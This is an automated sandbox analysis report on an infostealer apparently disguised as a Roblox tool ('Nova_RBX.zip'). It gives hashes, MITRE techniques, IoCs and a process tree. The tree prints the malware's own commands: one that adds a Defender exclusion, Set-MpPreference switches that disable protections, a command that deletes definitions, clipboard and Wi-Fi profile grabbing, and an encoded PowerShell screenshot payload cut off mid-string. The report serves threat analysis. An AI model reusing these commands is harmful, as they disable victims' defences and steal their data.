3dafac9512b77f34bde8a001f95f74f72a4f167b8f16a983a2b0ead1baa50c47

Analysis

max time kernel
315s
max time network
313s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 08:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nova_RBX.zip
Size

10.8MB
MD5

59a72e4727796ffb5027e487734e814c
SHA1

668c746b16710cabbc78480ac0545937bb201b2f
SHA256

3dafac9512b77f34bde8a001f95f74f72a4f167b8f16a983a2b0ead1baa50c47
SHA512

cf04af5d71c50cb4a7fa2dd3b1987eef11bf45c8bbf4412e76cc3e7cae42987ff4d9d1a5b1692abe4ecb5fb577e2d1f08a48b2d4ed51ef7f102486ba1371b296
SSDEEP

196608:KeaMHu8raDADdxtxBAma2B/j3MSY+qEBaiOitnrUuTqZUIYUtHsw02:7aqT0IdnAR2lj8SYvoOKnrUuTqZUJ1x2

Score

8^/10

execution pyinstaller spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

5396 powershell.exe
2932 powershell.exe
2236 powershell.exe
1852 powershell.exe
Executes dropped EXE 8 IoCs

Processes:

Nova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exe

pid process

3980 Nova.exe
3140 Nova.exe
3032 Nova.exe
5200 Nova.exe
5908 Nova.exe
5480 Nova.exe
5040 Nova.exe
5612 Nova.exe

pid	process
5396	powershell.exe
2932	powershell.exe
2236	powershell.exe
1852	powershell.exe

pid	process
3980	Nova.exe
3140	Nova.exe
3032	Nova.exe
5200	Nova.exe
5908	Nova.exe
5480	Nova.exe
5040	Nova.exe
5612	Nova.exe

Loads dropped DLL 64 IoCs

Processes:

NovaRBX.exeNova.exeNova.exeNova.exe

pid	process
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
4968	NovaRBX.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
3140	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5200	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe
5480	Nova.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

83 ip-api.com
99 ip-api.com

flow	ioc
83	ip-api.com
99	ip-api.com

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe	pyinstaller

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exe

pid process

5380 WMIC.exe
1388 WMIC.exe
Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3096 tasklist.exe
3552 tasklist.exe
5380 tasklist.exe
5640 tasklist.exe
5696 tasklist.exe
2116 tasklist.exe
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

5528 systeminfo.exe
2308 systeminfo.exe

pid	process
5380	WMIC.exe
1388	WMIC.exe

pid	process
3096	tasklist.exe
3552	tasklist.exe
5380	tasklist.exe
5640	tasklist.exe
5696	tasklist.exe
2116	tasklist.exe

pid	process
5528	systeminfo.exe
2308	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exetaskmgr.exepowershell.exe

pid	process
428	powershell.exe
428	powershell.exe
2236	powershell.exe
2236	powershell.exe
428	powershell.exe
2236	powershell.exe
5372	powershell.exe
5372	powershell.exe
5396	powershell.exe
5396	powershell.exe
5372	powershell.exe
5396	powershell.exe
5132	powershell.exe
5132	powershell.exe
5132	powershell.exe
5672	powershell.exe
5672	powershell.exe
5672	powershell.exe
5908	powershell.exe
5908	powershell.exe
5908	powershell.exe
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
1852	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetasklist.exetasklist.exeWMIC.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	428	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	3096	tasklist.exe
Token: SeDebugPrivilege	3552	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5404	WMIC.exe
Token: SeSecurityPrivilege	5404	WMIC.exe
Token: SeTakeOwnershipPrivilege	5404	WMIC.exe
Token: SeLoadDriverPrivilege	5404	WMIC.exe
Token: SeSystemProfilePrivilege	5404	WMIC.exe
Token: SeSystemtimePrivilege	5404	WMIC.exe
Token: SeProfSingleProcessPrivilege	5404	WMIC.exe
Token: SeIncBasePriorityPrivilege	5404	WMIC.exe
Token: SeCreatePagefilePrivilege	5404	WMIC.exe
Token: SeBackupPrivilege	5404	WMIC.exe
Token: SeRestorePrivilege	5404	WMIC.exe
Token: SeShutdownPrivilege	5404	WMIC.exe
Token: SeDebugPrivilege	5404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5404	WMIC.exe
Token: SeRemoteShutdownPrivilege	5404	WMIC.exe
Token: SeUndockPrivilege	5404	WMIC.exe
Token: SeManageVolumePrivilege	5404	WMIC.exe
Token: 33	5404	WMIC.exe
Token: 34	5404	WMIC.exe
Token: 35	5404	WMIC.exe
Token: 36	5404	WMIC.exe
Token: SeDebugPrivilege	5372	powershell.exe
Token: SeDebugPrivilege	5380	tasklist.exe
Token: SeDebugPrivilege	5396	powershell.exe
Token: SeIncreaseQuotaPrivilege	5404	WMIC.exe
Token: SeSecurityPrivilege	5404	WMIC.exe
Token: SeTakeOwnershipPrivilege	5404	WMIC.exe
Token: SeLoadDriverPrivilege	5404	WMIC.exe
Token: SeSystemProfilePrivilege	5404	WMIC.exe
Token: SeSystemtimePrivilege	5404	WMIC.exe
Token: SeProfSingleProcessPrivilege	5404	WMIC.exe
Token: SeIncBasePriorityPrivilege	5404	WMIC.exe
Token: SeCreatePagefilePrivilege	5404	WMIC.exe
Token: SeBackupPrivilege	5404	WMIC.exe
Token: SeRestorePrivilege	5404	WMIC.exe
Token: SeShutdownPrivilege	5404	WMIC.exe
Token: SeDebugPrivilege	5404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5404	WMIC.exe
Token: SeRemoteShutdownPrivilege	5404	WMIC.exe
Token: SeUndockPrivilege	5404	WMIC.exe
Token: SeManageVolumePrivilege	5404	WMIC.exe
Token: 33	5404	WMIC.exe
Token: 34	5404	WMIC.exe
Token: 35	5404	WMIC.exe
Token: 36	5404	WMIC.exe
Token: SeDebugPrivilege	5132	powershell.exe
Token: SeDebugPrivilege	5672	powershell.exe
Token: SeIncreaseQuotaPrivilege	6128	WMIC.exe
Token: SeSecurityPrivilege	6128	WMIC.exe
Token: SeTakeOwnershipPrivilege	6128	WMIC.exe
Token: SeLoadDriverPrivilege	6128	WMIC.exe
Token: SeSystemProfilePrivilege	6128	WMIC.exe
Token: SeSystemtimePrivilege	6128	WMIC.exe
Token: SeProfSingleProcessPrivilege	6128	WMIC.exe
Token: SeIncBasePriorityPrivilege	6128	WMIC.exe
Token: SeCreatePagefilePrivilege	6128	WMIC.exe
Token: SeBackupPrivilege	6128	WMIC.exe
Token: SeRestorePrivilege	6128	WMIC.exe
Token: SeShutdownPrivilege	6128	WMIC.exe
Token: SeDebugPrivilege	6128	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

NOTEPAD.EXEtaskmgr.exetaskmgr.exe

pid	process
3284	NOTEPAD.EXE
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exetaskmgr.exe

pid	process
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
5144	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe
4032	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NovaRBX.exeNovaRBX.execmd.exeNova.exeNova.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3820 wrote to memory of 4968	3820	NovaRBX.exe	NovaRBX.exe
PID 3820 wrote to memory of 4968	3820	NovaRBX.exe	NovaRBX.exe
PID 4968 wrote to memory of 1952	4968	NovaRBX.exe	cmd.exe
PID 4968 wrote to memory of 1952	4968	NovaRBX.exe	cmd.exe
PID 1952 wrote to memory of 3980	1952	cmd.exe	Nova.exe
PID 1952 wrote to memory of 3980	1952	cmd.exe	Nova.exe
PID 3980 wrote to memory of 3140	3980	Nova.exe	Nova.exe
PID 3980 wrote to memory of 3140	3980	Nova.exe	Nova.exe
PID 3140 wrote to memory of 4652	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 4652	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 5040	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 5040	3140	Nova.exe	cmd.exe
PID 4652 wrote to memory of 2236	4652	cmd.exe	powershell.exe
PID 4652 wrote to memory of 2236	4652	cmd.exe	powershell.exe
PID 5040 wrote to memory of 428	5040	cmd.exe	powershell.exe
PID 5040 wrote to memory of 428	5040	cmd.exe	powershell.exe
PID 3140 wrote to memory of 3560	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 3560	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 4396	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 4396	3140	Nova.exe	cmd.exe
PID 3560 wrote to memory of 3096	3560	cmd.exe	tasklist.exe
PID 3560 wrote to memory of 3096	3560	cmd.exe	tasklist.exe
PID 4396 wrote to memory of 3552	4396	cmd.exe	tasklist.exe
PID 4396 wrote to memory of 3552	4396	cmd.exe	tasklist.exe
PID 3140 wrote to memory of 2848	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 2848	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 3308	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 3308	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 1840	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 1840	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 2452	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 2452	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 716	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 716	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 2096	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 2096	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 224	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 224	3140	Nova.exe	cmd.exe
PID 1840 wrote to memory of 5316	1840	cmd.exe	tree.com
PID 1840 wrote to memory of 5316	1840	cmd.exe	tree.com
PID 2452 wrote to memory of 5372	2452	cmd.exe	powershell.exe
PID 2452 wrote to memory of 5372	2452	cmd.exe	powershell.exe
PID 3308 wrote to memory of 5380	3308	cmd.exe	tasklist.exe
PID 3308 wrote to memory of 5380	3308	cmd.exe	tasklist.exe
PID 224 wrote to memory of 5396	224	cmd.exe	powershell.exe
PID 224 wrote to memory of 5396	224	cmd.exe	powershell.exe
PID 2848 wrote to memory of 5404	2848	cmd.exe	WMIC.exe
PID 2848 wrote to memory of 5404	2848	cmd.exe	WMIC.exe
PID 3140 wrote to memory of 5420	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 5420	3140	Nova.exe	cmd.exe
PID 716 wrote to memory of 5436	716	cmd.exe	netsh.exe
PID 716 wrote to memory of 5436	716	cmd.exe	netsh.exe
PID 2096 wrote to memory of 5528	2096	cmd.exe	systeminfo.exe
PID 2096 wrote to memory of 5528	2096	cmd.exe	systeminfo.exe
PID 5420 wrote to memory of 5724	5420	cmd.exe	tree.com
PID 5420 wrote to memory of 5724	5420	cmd.exe	tree.com
PID 3140 wrote to memory of 5752	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 5752	3140	Nova.exe	cmd.exe
PID 5752 wrote to memory of 5840	5752	cmd.exe	tree.com
PID 5752 wrote to memory of 5840	5752	cmd.exe	tree.com
PID 3140 wrote to memory of 5852	3140	Nova.exe	cmd.exe
PID 3140 wrote to memory of 5852	3140	Nova.exe	cmd.exe
PID 5852 wrote to memory of 5924	5852	cmd.exe	tree.com
PID 5852 wrote to memory of 5924	5852	cmd.exe	tree.com

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Nova_RBX.zip
1⤵
PID:3932

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4244

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Nova-Roblox\INFO.txt
1⤵
- Suspicious use of FindShellTrayWindow
PID:3284

C:\Users\Admin\Desktop\Nova-Roblox\NovaRBX.exe
"C:\Users\Admin\Desktop\Nova-Roblox\NovaRBX.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3820

C:\Users\Admin\Desktop\Nova-Roblox\NovaRBX.exe
"C:\Users\Admin\Desktop\Nova-Roblox\NovaRBX.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Nova.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
Nova.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3980

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
Nova.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe'"
6⤵
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
6⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
- Suspicious use of WriteProcessMemory
PID:4396

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
6⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:5404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
6⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
- Suspicious use of WriteProcessMemory
PID:3308

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
6⤵
- Suspicious use of WriteProcessMemory
PID:716

C:\Windows\system32\netsh.exe
netsh wlan show profile
7⤵
PID:5436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
6⤵
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\system32\systeminfo.exe
systeminfo
7⤵
- Gathers system information
PID:5528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAY